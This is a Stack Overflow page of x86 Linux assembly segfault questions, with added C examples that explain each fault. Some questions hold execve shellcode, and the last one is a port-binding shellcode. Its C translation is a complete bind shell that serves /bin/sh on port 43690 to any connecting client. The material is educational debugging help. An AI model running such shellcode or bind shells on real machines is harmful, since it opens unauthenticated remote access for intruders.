getting segmentation fault in assembly [duplicate] - linux

This question already has answers here:
Nasm segmentation fault on RET in _start
(1 answer)
Assembly segmentation fault after making a system call, at the end of my code
(1 answer)
Closed 4 years ago.
Program received signal SIGSEGV, Segmentation fault.
I am using this assembly program:
and for some reason I'm getting a segmentation fault. Is it related to the stack? What is this program even supposed to output? Somebody told me to run it and see what it does. Any ideas?
I thought it would be problematic and made a post about it, but it wasn't a problem. I tried debugging it with GDB and that didn't really help. If you could tell me what it outputs it would probably be even better; that's what I'm really looking for.
.code32
.intel_syntax noprefix
.global _start
_start:
mov eax, 0x04
push eax                          # second argument (ends up at [ebp+0xc])
mov eax, 0x2d
push eax                          # first argument (ends up at [ebp+0x8])
call asm2                         # the return address is the address of asm2 itself
asm2:
push ebp
mov ebp, esp
sub esp, 0x10
mov eax, DWORD PTR [ebp + 0xc]    # seg fault here
mov DWORD PTR [ebp-0x4], eax      # local counter, initialised from the second argument
mov eax, DWORD PTR[ebp+0x8]
mov DWORD PTR [ebp-0x8], eax      # copy of the first argument (never read again)
jmp part_b
part_a:
add DWORD PTR [ebp - 0x4], 0x1    # counter += 1
add DWORD PTR [ebp + 0x8], 0x64   # first argument += 100
part_b:
cmp DWORD PTR [ebp+0x8], 0x1d89   # loop while first argument <= 0x1d89 (signed)
jle part_a
mov eax, DWORD PTR [ebp-0x4]      # return the counter
mov esp, ebp
pop ebp
ret
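
This question has no answer on this page, so here is an added example (my own C, not code from the asker or from any answer) that translates asm2 into C so its return value can be checked. Two things are visible in the listing itself: the file is not a standalone program, since _start never makes an exit system call, and `call asm2` is immediately followed by the asm2 label, so the return address it pushes is asm2 itself; the linked duplicates cover why falling through or returning from _start ends in a segfault. The function itself is just a counting loop:

```c
#include <stdint.h>
#include <stdio.h>

/* asm2 as posted, translated to C.
 * a is the argument at [ebp+0x8] (pushed last, 0x2d), b the one at [ebp+0xc] (4).
 * [ebp-4] is the counter, initialised from b; [ebp-8] holds a copy of a that is
 * never read again. 'jle' is a signed compare, hence int32_t. */
int32_t asm2(int32_t a, int32_t b) {
    int32_t counter = b;          /* mov eax,[ebp+0xc] ; mov [ebp-4],eax */
    int32_t copy = a;             /* mov eax,[ebp+0x8] ; mov [ebp-8],eax */
    (void)copy;                   /* unused afterwards, as in the assembly */
    while (a <= 0x1d89) {         /* part_b: cmp [ebp+8],0x1d89 ; jle part_a */
        counter += 1;             /* part_a: add dword [ebp-4],1 */
        a += 0x64;                /*         add dword [ebp+8],0x64 */
    }
    return counter;               /* mov eax,[ebp-4] ; leave ; ret */
}

/* How many times the loop body runs for a given first argument. */
int32_t iterations(int32_t a) {
    return asm2(a, 0);
}

int main(void) {
    int32_t r = asm2(0x2d, 0x04);   /* the two values pushed by _start */
    printf("asm2(0x2d, 0x4) = %d (0x%x), loop ran %d times\n",
           r, r, iterations(0x2d));
    return 0;
}
```

With the arguments _start pushes, the loop runs 76 times (0x2d + 76*0x64 is the first value above 0x1d89) and the function returns 4 + 76 = 0x50. Whatever the caller then does with EAX is beyond this file; without an exit syscall there is nothing valid to return to.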

Related

execute system command (bash) using assembly?

Basically I am trying to execute the command /bin/ls using assembly, but unfortunately I am failing:
SECTION .data
buf: db "Hello", 5
SECTION .text
global _start
_start:
xor eax, eax
mov edx, eax
push edx
mov eax, 0x736c2f2f ; "sl/"
push eax
mov eax, 0x6e69622f ; "nib/"
push eax
mov ebx, esp
push edx
mov eax, 0x2f
push eax
mov ecx, esp
mov eax, 11
xor edx, edx
int 0x80
mov eax, 1
int 0x80
But if I change the mov eax, 11 to mov eax, 4 and add mov edx, 7 after xor edx, edx, it does print /bin/ls.
Can anyone point the mistake I am making?
Compiling the code with nasm -g -f elf -F dwarf ./shell.asm && ld -m elf_i386 -o shell shell.o and my arch is Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
Found the problem. As pointed out by @Jestor (thank you), I needed to store the executing file in ebx and all the arguments including the filename in ecx, and set edx to null, as below:
SECTION .data
buf: db "./", 0
SECTION .text
global _start
_start:
xor eax, eax
xor edx, edx
push eax
push long 0x736c2f2f ; "sl/"
push long 0x6e69622f ; "nib/"
mov ebx, esp
push eax
push byte 0x2f
mov esi, esp
push eax
push esi
push ebx
mov ecx, esp
mov eax, 0x0b
int 0x80
mov eax, 1
int 0x80
After my working shell, ecx looked like this:
(gdb) x/50x $ecx
0xffffd370: 0xffffd384 0xffffd37c 0x00000000 0x0000002f
0xffffd380: 0x00000000 0x6e69622f 0x736c2f2f 0x00000000
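
As an added example (my own C, not the asker's code or Jestor's answer), the push sequence of the working version replayed on a small model of the 32-bit stack and then decoded the way execve(2) reads its three registers: ebx must point at the path, ecx at an array of 32-bit pointers terminated by a zero, and edx is either a pointer to such an array or 0 for no environment. The offsets it produces match the gdb dump above (argv[0] sits 0x14 bytes above ecx, the "/" string 0xc bytes above it). It also replays the first attempt, where ecx pointed at the string "/" itself, so the kernel read the dword 0x2f as argv[0]; that is not a mapped address, which is why the call failed (the kernel rejects it with EFAULT).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the 32-bit stack: 'push' moves esp down by 4 and stores a
 * little-endian dword, as the CPU does. Addresses are byte offsets into mem[]. */
#define STACK_SIZE 64
struct stack32 {
    uint8_t mem[STACK_SIZE];
    uint32_t esp;
};

static void push(struct stack32 *s, uint32_t v) {
    s->esp -= 4;
    for (int i = 0; i < 4; i++)
        s->mem[s->esp + i] = (uint8_t)(v >> (8 * i));   /* little-endian store */
}

static uint32_t load32(const struct stack32 *s, uint32_t off) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)s->mem[off + i] << (8 * i);
    return v;
}

struct execve_args {
    const char *filename;     /* what ebx points at */
    const char *argv[4];      /* what ecx points at, decoded and NULL-terminated */
    int argc;
    int envp_is_null;         /* edx == 0 */
};

/* Replays the pushes of the working shellcode and decodes ebx/ecx/edx the way
 * execve(2) would. Returns 0 on success, -1 if argv is malformed. */
int build_execve_args(struct stack32 *s, struct execve_args *out) {
    const uint32_t eax = 0, edx = 0;   /* xor eax,eax ; xor edx,edx */
    s->esp = STACK_SIZE;
    push(s, eax);                      /* push eax          NUL terminating the path */
    push(s, 0x736c2f2f);               /* push long "sl//"  bytes 2f 2f 6c 73 = "//ls" */
    push(s, 0x6e69622f);               /* push long "nib/"  bytes 2f 62 69 6e = "/bin" */
    uint32_t ebx = s->esp;             /* mov ebx, esp      ebx -> "/bin//ls" */
    push(s, eax);                      /* push eax          NUL terminating "/" */
    push(s, 0x2f);                     /* push byte 0x2f    still a 4-byte push: "/" */
    uint32_t esi = s->esp;             /* mov esi, esp      esi -> "/" */
    push(s, eax);                      /* push eax          argv[2] = NULL */
    push(s, esi);                      /* push esi          argv[1] = "/" */
    push(s, ebx);                      /* push ebx          argv[0] = "/bin//ls" */
    uint32_t ecx = s->esp;             /* mov ecx, esp      ecx -> argv */

    out->filename = (const char *)&s->mem[ebx];
    int i;
    for (i = 0; i < 3; i++) {
        uint32_t p = load32(s, ecx + 4 * i);
        if (p == 0) break;
        if (p >= STACK_SIZE) return -1;   /* not an address inside our stack */
        out->argv[i] = (const char *)&s->mem[p];
    }
    if (i == 3) return -1;                /* no terminating NULL pointer */
    out->argv[i] = NULL;
    out->argc = i;
    out->envp_is_null = (edx == 0);
    return 0;
}

/* The first attempt: ecx pointed at the string "/" rather than at an array of
 * pointers, so the dword the kernel reads as argv[0] is this value. */
uint32_t first_attempt_argv0(struct stack32 *s) {
    s->esp = STACK_SIZE;
    push(s, 0);                        /* push edx (edx == eax == 0) */
    push(s, 0x736c2f2f);
    push(s, 0x6e69622f);               /* mov ebx, esp -> "/bin//ls" (this part was fine) */
    push(s, 0);                        /* push edx */
    push(s, 0x2f);                     /* mov eax, 0x2f ; push eax ; mov ecx, esp */
    return load32(s, s->esp);          /* argv[0] == 0x2f, not a pointer */
}

int main(void) {
    struct stack32 s;
    struct execve_args a;
    if (build_execve_args(&s, &a) == 0) {
        printf("execve(\"%s\", {", a.filename);
        for (int i = 0; i < a.argc; i++) printf("\"%s\", ", a.argv[i]);
        printf("NULL}, %s)\n", a.envp_is_null ? "NULL" : "envp");
    }
    printf("first attempt argv[0] = 0x%x\n", first_attempt_argv0(&s));
    return 0;
}
```

The doubled slash in "/bin//ls" is only padding so the path is a whole number of dwords; the kernel's path lookup treats it like a single slash.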

how to call lseek and _llseek syscall from assembly [duplicate]

I was experimenting and have the following assembly code, which works very well, except that I get a "Segmentation fault (core dumped)" message right before my program ends:
GLOBAL _start
%define ___STDIN 0
%define ___STDOUT 1
%define ___SYSCALL_WRITE 0x04
segment .data
segment .rodata
L1 db "hello World", 10, 0
segment .bss
segment .text
_start:
mov eax, ___SYSCALL_WRITE
mov ebx, ___STDOUT
mov ecx, L1
mov edx, 13
int 0x80
It doesn't matter whether or not I have ret at the end; I still get the message.
What's the problem?
I'm using x86 and nasm.
You can't ret from start; it isn't a function and there's no return address on the stack. The stack pointer points at argc on process entry.
As n.m. said in the comments, the issue is that you aren't exiting the program, so execution runs off into garbage code and you get a segfault.
What you need is:
;; Linux 32-bit x86
%define ___SYSCALL_EXIT 1
; ... at the end of _start:
mov eax, ___SYSCALL_EXIT
mov ebx, 0
int 0x80
The above is 32-bit code. In 64-bit code you want mov eax, 231 (exit_group) / syscall, with the exit status in EDI. For example:
;; Linux x86-64
xor edi, edi ; or mov edi, eax if you have a ret val in EAX
mov eax, 231 ; __NR_exit_group
syscall

Linux Assembly segmentation fault print using loop

I'm writing an assembly program that would print even numbers between 0-9 using a loop. I encountered this problem, a segmentation fault while running the code. I checked other answers on the site but couldn't find one that addresses my issue.
I suspect that the function nwLine might be the source of the problem.
;;this program prints even numbers from 0-8 using loop function
section .text
global _start
cr db 10
_start: ;tell linker entry point
mov ecx, 5
mov eax, '0'
evenLoop:
mov [evnum], eax ;add eax to evnum
mov eax, 4
mov ebx, 1
push ecx
mov ecx, evnum
mov edx, 1
int 80h
call nwLine
mov eax, [evnum]
sub eax, '1'
inc eax
add eax, '2'
pop ecx
loop evenLoop
nwLine: ;function to move pointer to next line
mov eax,4 ; System call number(sys_write)
mov ebx,1 ; File descriptor 1 - standard output
mov ecx, cr
mov edx, 1
int 80h ; Call the kernel
ret
mov eax,1 ;system call number (sys_exit)
int 80h ;call kernel
section .bss
evnum resb 1
If anyone knows how to solve the problem with the nwLine function, please tell me.

mov byte [esi +9], bl causing segfault [duplicate]

This question already has an answer here:
execve shellcode linux segmentation fault
(1 answer)
Closed 7 years ago.
Any idea why this is causing a segfault? mov byte [esi +9], bl
I went through it line by line using the debugger and the segfault appears after it executes that line.
Which I guess means it's trying to access something in memory that it's not supposed to.
Here is the whole code:
global _start
section .text
_start:
jmp short call_shellcode
shellcode:
pop esi
xor ebx, ebx
mov byte [esi +9], bl
mov dword [esi +10], esi
mov dword [esi +14], ebx
lea ebx, [esi]
lea ecx, [esi +10]
lea edx, [esi +14]
xor eax, eax
mov al, 0xb
int 0x80
call_shellcode:
call shellcode
message db "/bin/bashABBBBCCCC"
By default the text section is not writeable, and the data section is not executable.
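
To make the answer concrete, here is an added example (my own C, not the asker's shellcode or the answerer's code) that performs the same three stores the shellcode does after pop esi, once on a writable page and once on a read-only page standing in for the default .text section. A SIGSEGV handler with siglongjmp turns the fault into a return value instead of killing the process, and a layout check confirms that on the writable page the result is exactly what execve is handed: "/bin/bash" NUL-terminated at offset 9, a 32-bit pointer to it at offset 10 (argv[0]), and a zero dword at offset 14 (argv[1], also passed as envp). PROT_READ alone is used for the read-only case; the real .text also has the execute bit, which does not change the outcome of a write.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value; only needed under strict feature macros */
#endif

/* Same bytes as the posted 'message' label: the path, one byte to overwrite
 * with NUL, four bytes for argv[0], four bytes for the terminating NULL. */
static const char message[] = "/bin/bashABBBBCCCC";

static sigjmp_buf fault_jmp;
static void on_segv(int sig) { (void)sig; siglongjmp(fault_jmp, 1); }

/* The stores the shellcode performs with esi -> message and ebx == 0:
 *   mov byte  [esi+9],  bl    ; NUL-terminate "/bin/bash"
 *   mov dword [esi+10], esi   ; argv[0] = pointer to the path (32-bit, as in the shellcode)
 *   mov dword [esi+14], ebx   ; argv[1] = NULL, also used as envp
 * Returns 1 if all three stores completed, 0 if one of them faulted. */
int patch_in_place(uint8_t *esi) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    volatile int ok = 0;
    if (sigsetjmp(fault_jmp, 1) == 0) {
        uint32_t p = (uint32_t)(uintptr_t)esi;
        esi[9] = 0;
        memcpy(esi + 10, &p, sizeof p);
        memset(esi + 14, 0, 4);
        ok = 1;
    }
    sigaction(SIGSEGV, &old, NULL);    /* restore whatever handler was installed before */
    return ok;
}

/* Checks that the patched buffer is the execve argument layout described above. */
int layout_ok(const uint8_t *esi) {
    uint32_t argv0, argv1;
    memcpy(&argv0, esi + 10, 4);
    memcpy(&argv1, esi + 14, 4);
    return strcmp((const char *)esi, "/bin/bash") == 0
        && argv0 == (uint32_t)(uintptr_t)esi
        && argv1 == 0;
}

/* Copies message into a fresh page, sets the requested protection, then runs
 * the patch. PROT_READ models the default .text (no write bit);
 * PROT_READ|PROT_WRITE models a writable section (ld -N) or a writable buffer.
 * Returns 1 if the patch succeeded and the layout is right, 0 if a store
 * faulted, -1 if mmap/mprotect failed. */
int patch_under_protection(int prot) {
    long pg = sysconf(_SC_PAGESIZE);
    uint8_t *page = mmap(NULL, pg, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    memcpy(page, message, sizeof message);
    if (mprotect(page, pg, prot) != 0) { munmap(page, pg); return -1; }
    int ok = patch_in_place(page);
    if (ok) ok = layout_ok(page);
    munmap(page, pg);
    return ok;
}

int main(void) {
    printf("writable page : %d\n", patch_under_protection(PROT_READ | PROT_WRITE));
    printf("read-only page: %d\n", patch_under_protection(PROT_READ));
    return 0;
}
```

The usual ways out are the ones the next question mentions: link with ld -N so .text is writable, or place the shellcode in a buffer that is both writable and executable when testing it from a C harness.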

segmentation fault in port-binding shellcode

I am trying to open a listener using shellcode but I get a segmentation error. I read that this error is due to writing into a read-only location in memory, and that the -N option of the ld linker will solve it, which did not work for me.
The code:
BITS 32
global _start
_start:
xor eax,eax
xor ebx,ebx
cdq
push eax
push byte 0x01
push byte 0x02
mov ecx,esp
inc bl
mov al,102
int 80h
mov esi,eax
push edx
push 0xAAAA02AA
mov ecx,esp
push byte 0x10
push ecx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
push edx
push esi
mov ecx,esp
mov byte bl,0x04
mov al,102
int 80h
push edx
push edx
push esi
mov ecx,esp
inc bl
mov al,102
int 80h
mov ebx,esp
xor ecx,ecx
mov cl,3
loop:
dec cl
mov al,63
int 80h
jnz loop
push edx
push long 0x68732f2f
push long 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b
int 80h
I then run the following commands:
nasm -f elf file.asm
ld -N file.o -o file
When I run file I get a segmentation error. Please help.
Learn to use a debugger and comment your code. That said, the problem seems to be with the dup2 syscall getting a bad argument, because the esp value that gets loaded into ebx is unlikely to be a valid descriptor. This results in an error return, which then screws up all further syscalls.
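
As an added example (my own C, not the asker's shellcode or the answerer's code), the same socket/bind/listen/accept/dup2/execve sequence with every return value checked, so that a bad descriptor is reported at the dup2 step instead of silently breaking everything after it. It uses port 0xAAAA (43690) and INADDR_ANY like the shellcode. One caveat visible in the listing: the dword 0xAAAA02AA pushed as the sockaddr puts 0x02AA into sin_family rather than AF_INET (2), which is another error that checking bind's return value would have exposed.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* socket(AF_INET, SOCK_STREAM, 0); bind(INADDR_ANY:port); listen(): the first
 * three socketcall()s of the shellcode, each checked. Returns the listening
 * fd, or -1 with errno set. */
int bind_listen(uint16_t port) {
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) return -1;
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;            /* must be 2; the shellcode pushes 0x02AA here */
    sin.sin_port = htons(port);          /* bytes AA AA in the pushed dword */
    sin.sin_addr.s_addr = INADDR_ANY;    /* push edx (0) */
    if (bind(s, (struct sockaddr *)&sin, sizeof sin) < 0 || listen(s, 0) < 0) {
        int e = errno;
        close(s);
        errno = e;
        return -1;
    }
    return s;
}

/* 1 if fd is an open descriptor, 0 if not. A stack address copied into EBX
 * (e.g. 0xffffd370) is a negative int once the kernel reads it as an fd. */
int fd_is_valid(int fd) {
    return fcntl(fd, F_GETFD) != -1;
}

/* The shellcode's loop: cl counts 3,2,1, so it does dup2(client,2),
 * dup2(client,1), dup2(client,0). The fd is validated first and the number of
 * successful dup2 calls is returned (3 on success, -1 for a bad fd), so a wrong
 * EBX is reported instead of leaving the shell's stdio untouched. */
int redirect_stdio(int client) {
    if (!fd_is_valid(client)) return -1;
    int done = 0;
    for (int n = 2; n >= 0; n--)
        if (dup2(client, n) == n) done++;
    return done;
}

int main(void) {
    int l = bind_listen(43690);                  /* 0xAAAA, the port bytes the shellcode pushes */
    if (l < 0) { perror("bind_listen"); return 1; }
    int c = accept(l, NULL, NULL);               /* socketcall SYS_ACCEPT; this is the fd EBX needs */
    if (c < 0) { perror("accept"); return 1; }
    if (redirect_stdio(c) != 3) { perror("dup2"); return 1; }
    char *argv[] = { "/bin//sh", NULL };         /* push "//sh" ; push "/bin" ; ebx = esp */
    execve(argv[0], argv, NULL);
    perror("execve");                            /* only reached on failure */
    return 1;
}
```

In the posted shellcode the equivalent of `c` is in EAX after the accept socketcall; `mov ebx, eax` at that point is what the dup2 loop needs, whereas `mov ebx, esp` hands dup2 a stack address.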
